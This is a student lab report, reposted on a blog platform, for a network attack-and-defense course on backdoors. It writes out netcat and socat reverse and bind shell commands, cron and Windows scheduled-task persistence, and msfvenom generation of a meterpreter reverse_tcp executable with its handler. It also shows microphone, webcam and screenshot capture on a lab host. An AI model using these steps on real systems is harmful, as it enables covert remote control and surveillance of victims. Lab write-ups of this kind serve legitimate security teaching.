20155331 丹增旦达 网络攻防 Exp2后门原理与实践

最新推荐文章于 2024-08-21 17:05:31 发布
最新推荐文章于 2024-08-21 17:05:31 发布
阅读量111 收藏
点赞数
文章标签: 操作系统 shell 网络
原文链接:http://www.cnblogs.com/dd1174751354/p/8707986.html
版权

20155331 丹增旦达《网络攻防》Exp2后门原理与实践

实验内容

(1)使用netcat获取主机操作Shell,cron启动

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

实验过程

windows获取shell

首先查看windows的ip地址:
1071515-20180403131347115-157180773.png

下载ncat并进入该目录,打开cmd
1071515-20180403131551659-2078926935.png

Linux反弹连接Win,输入命令nc 192.168.217.130 5331 -e /bin/sh
1071515-20180403132010078-2041584379.png

Windows下获得一个linux shell,可运行任何指令,如ls:

1071515-20180403132021542-1734887370.png

Linux获得Win Shell

用ifconfig命令查看本机IP

1071515-20180403132043628-1642349853.png

Linux运行监听指令,输入命令nc -l -p 5331
1071515-20180403132258054-2050964822.png

Windows反弹连接Linux,在ncat目录下输入命令ncat.exe -e cmd.exe 192.168.217.128 5331
1071515-20180403132839133-1418649540.png

Linux下看到Windows的命令提示

使用netcat获取主机操作Shell,cron启动

先在Windows系统下,ncat.exe -l -p 5331,监听端口
1071515-20180403133046312-858721800.png

用crontab -e指令编辑一条定时任务。

在最后一行加入XX * * * * /bin/netcat XXXXXXX 5331 -e /bin/sh,

到时间后,便获得了Kali的shell,可以输入指令
1071515-20180403133115535-740236112.png

使用socat获取主机操作Shell, 任务计划启动

在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器

在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5331 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5331,同时把cmd.exe的stderr重定向到stdout上
1071515-20180403133149940-1124927680.png

创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行
1071515-20180403133155365-131895756.png

此时,在Kali环境下输入指令socat - tcp:192.168.1.227:5331,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5331端口,此时可以发现已经成功获得了一个cmd shell

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

输入指令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.217.128 LPORT=5331 -f exe > 20155331_backdoor.exe
1071515-20180403143036417-1045983690.png

然后通过nc指令将生成的后门程序传送到Windows主机上
1071515-20180403143151723-683443938.png

1071515-20180403143241379-1888479065.png

此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

在Kali Linux中输入msfconsole命令:
1071515-20180403143327524-1625430734.png

之后逐步输入以下命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.211.55.10 //注意此处应为Linux的IP!
set LPORT 5331
//5314为端口号
show options
exploit
1071515-20180403143415257-74772130.png

输入命令record_mic可以截获一段音频:
1071515-20180403144108310-877926898.png

使用webcam_snap指令可以使用摄像头进行拍照,不过我这个摄像头一直打不开,,
1071515-20180403144155758-932234173.png

使用screenshot指令可以进行截屏
1071515-20180403144300295-1217837701.png

1071515-20180403144450194-2144645465.png

转载于:https://www.cnblogs.com/dd1174751354/p/8707986.html

aezm18818
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
《linux就该这么学——笔记》第2章 常用系统工作命令
leakey_lg的博客
01-22 411
2.4 系统状态检测命令 {1} ifconfig 用于获取网卡配置与网络状态等信息, 格式为“ifconfig [网络设备] [参数] [root@localhost Desktop]# ifconfig eno16777728: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 ether 00:0c:29:c...
第十二届noc网络机器人赛项成绩_2017年第15届中小学NOC活动全国决赛机器人超市购物赛项获奖结果...
weixin_26858217的博客
02-05 1370
序号竞赛编号组委会市赛项名称组别选手姓名学校名称指导教师所获奖项115CSX00079长春市长春市机器人超市购物小学组李铁 陈宇萱长春汽车经济技术开发区长沈路学校刘海亮一等奖215CSX00081长春市长春市机器人超市购物小学组顾宏鑫 白雨轩长春汽车经济技术开发区长沈路学校刘海亮一等奖315CSX00080长春市长春市机器人超市购物小...
windows、Linux 测试服务器、电脑的某些个端口是否打开
weixin_30647065的博客
05-24 393
测试远程端口是否开放包括两种方法: 一、 命令行的形式 二、代码 先参考我的博客windows、Linux 开放端口 一、命令行的形式 两个命令:telnet、nc(netcat) 两种网络层协议:TCP、UDP windows有telnet,只是默认没启动 windows10 配置telnet: http://www.xitongcheng.com/jiaocheng/wi...
CENTOS 6.0 开放端口80 3306 22等 iptables
iteye_13930的博客
08-25 1017
#/sbin/iptables -I INPUT -p tcp --dport 80 -j ACCEPT #/sbin/iptables -I INPUT -p tcp --dport 22 -j ACCEPT #/sbin/iptables -I INPUT -p tcp --dport 3306 -j ACCEPT 然后保存: #/etc/rc.d/init.d/iptables sa...
20155331 增旦 2006-2007-2 《Java程序设计》第二周学习总结
aezm18818的博客
03-05 86
20155331 增旦 2006-2007-2 《Java程序设计》第二周学习总结 教材学习内容总结 一 ,类型、变量与运算符 一、数据类型 1, 分类: 基本数据类型 byte:字节 short:短整形 long:长整形 boolean:表示真假的,取值为true或false 二、变量 1, 定义:内存中一块被命名好的存储空间 2, 作用:用来存储数据 3, 特点: 有名称,名称不...
2018-2019-2 20165323《网络攻防技术》Exp5 MSF基础应用
weixin_33811539的博客
04-16 142
一、知识点总结 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六种模块 渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去 主动渗透攻击:攻击某个系统服务 被动渗透攻击:攻击某个客户端应用 辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提 网络服务的扫描与查点 ...
20224229增央宗《Python程序设计》——实验报告3
dzyz20224229的博客
04-23 151
点分十进制字符串和二进制地址之间的转换函数主要有:inet_aton、inet_addr、inet_ntoa、inet_ntop、inet_pton 这五个,在我们的应用程序中使用它们需要包含头文件<sys/socket.h>、<arpa/inet.h>以及<netinet/in.h>模块来创建一个TCP套接字,绑定到一个特定的IP地址和端口,监听并接受客户端的连接,然后接收客户端发送的数据,并回复一条消息。(1)创建服务端和客户端,选择一个通信端口,用Python语言编程实现通信演示程序;
《linux就该这么学——笔记》第15章 使用Postfix与Dovecot部署邮件系统
leakey_lg的博客
02-27 335
使用Postfix与Dovecot部署邮件系统15.1 电子邮件系统 15.1 电子邮件系统 尽管FTP和web都可以实现数据传输,但都需要双方均在线。为了解决单方在线时仍可进行数据间的传递,电子邮件服务应运而生。 常见的邮件协议: 协议名称|功能简介 —|--- 简单邮件传输协议SMTP|(Simple Mail Transfer Protocol,SMTP)|用于发送和中转发出的电子邮件,占用...
20155331 实验四 Android开发基础
aezm18818的博客
05-24 86
20155331增旦实验四报告 实验四 Android程序设计-1 Android Stuidio的安装测试: 参考《Java和Android开发学习指南(第二版)(EPUBIT,Java for Android 2nd)》第二十四章: 安装 Android Stuidio 完成Hello World, 要求修改res目录中的内容,Hello World后要显示自己的学号,提交代码...
SP2游戏手柄,STM32-F103编程。
10-03
这是一个用 STM32F103 编写的SP2游戏手柄SPI编码识别程序。前一段时间在网上查了不少游戏手柄的说明文件。但是没有看到一个完整的、可正确编译的程序。本程序编译运行正常,每一个按键、拨杆动作都可以在USART1上...
《青藏公路上的等待》—阅读题答案.docx
02-09
这篇文档讲述了一个发生在青藏公路上的故事,主题围绕着感恩与报答展开。故事的核心人物是小女孩增和她的母亲,他们在格尔木路段为过往司机提供免费茶水。增和母亲等待的原因是为了找到一年前给予增帮助的一位...
初中语文文学讨论美文荐读登山者
09-09
这篇“初中语文文学讨论美文荐读登山者”是一篇充满深意的故事,讲述了新西兰登山者希拉里和向导增共同登顶珠穆朗玛峰的历史性时刻。故事的核心在于希拉里的谦让精神,他放弃第一时间登顶的机会,尊重并推崇向导...
Lesson 70 教学设计方案二-教学教案.docx
12-23
【Lesson 70 教学设计方案二】是一个针对英语课程的教学教案,主要目的是教授与“Lesson 70”相关的对话内容、新词汇以及复习过去完成时态。此教案适合使用计算机、投影仪和PPT文档等教学工具进行。 **教学目标:**...
广西2018年秋九年级英语上册Module1Wondersoftheworld主题阅读练习无答案新版外研版
08-05
2. 历史事件:1953年,新西兰的埃德蒙·希拉里爵士(Sir Edmund Hillary)和尼泊尔的增·诺尔盖(Tenzing Norgay)成为了首次登顶珠穆朗玛峰的人。 3. 山地探险与登山运动:文章讨论了珠穆朗玛峰的攀登历史,包括...
Freertos学习笔记
qq_45031559的博客
08-21 474
Freertos学习笔记
linux安装梦数据库
HAN_789的博客
08-19 203
如果无法创建dmdba 文件夹,需要进入root用户下 在管理员用户下,这种安装方式一般只用于验证,开发,测试,生产最好还是安装传统的方式安装。在 home/dmdba/dmdbms/bin 目录下执行。(1)将文件上传到 /home/dmdba/ 目录下。(2)加压:tar -xzvf dmdb.tar.gz。进入到root就可以创建dmdba 文件夹了。1、后台启动,一般建议用后台启动。
linux定期统计某个目录内每天的文件增量大小
最新发布
mengbing1990的博客
08-21 99
每天统计一次前一天的日志量大小,并将每个目录的大小记录一份日志。 本测试脚本下,所有目录产生的日志均有固定格式,如每个目录不一样的话,需定义find语句中的name变量。
Linux之RabbitMQ集群部署
m0_54563444的博客
08-21 844
消息中间件也可以称消息队列,是利用高效可靠的消息传递机制进行异步的数据传输并基于数据通信来进行分布式系统的集成。当下主流的消息中间件有等。Kafka是LinkedIn开源的分布式发布-订阅消息系统,目前归属于Apache顶级项目。Kafka主要特点是追求高吞吐量(单机可到10万级)时效性是毫秒级的,一开始的目的就是用于日志收集和传输。对消息的重复、丢失、错误没有严格要求,适合产生大量数据的互联网服务的数据收集业务。
大学食堂在线订餐系统:便捷生活与盈利模式
该论文标题为《食堂网上订餐系统》,由计算机科学与技术学院的计科074班学生李鹏魁、户洪松、陈进波、增尼玛和裴康合作开发,指导教师为郑明秀,完成于2010年6月10日。论文的背景是针对大学生日常忙碌的生活节奏,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值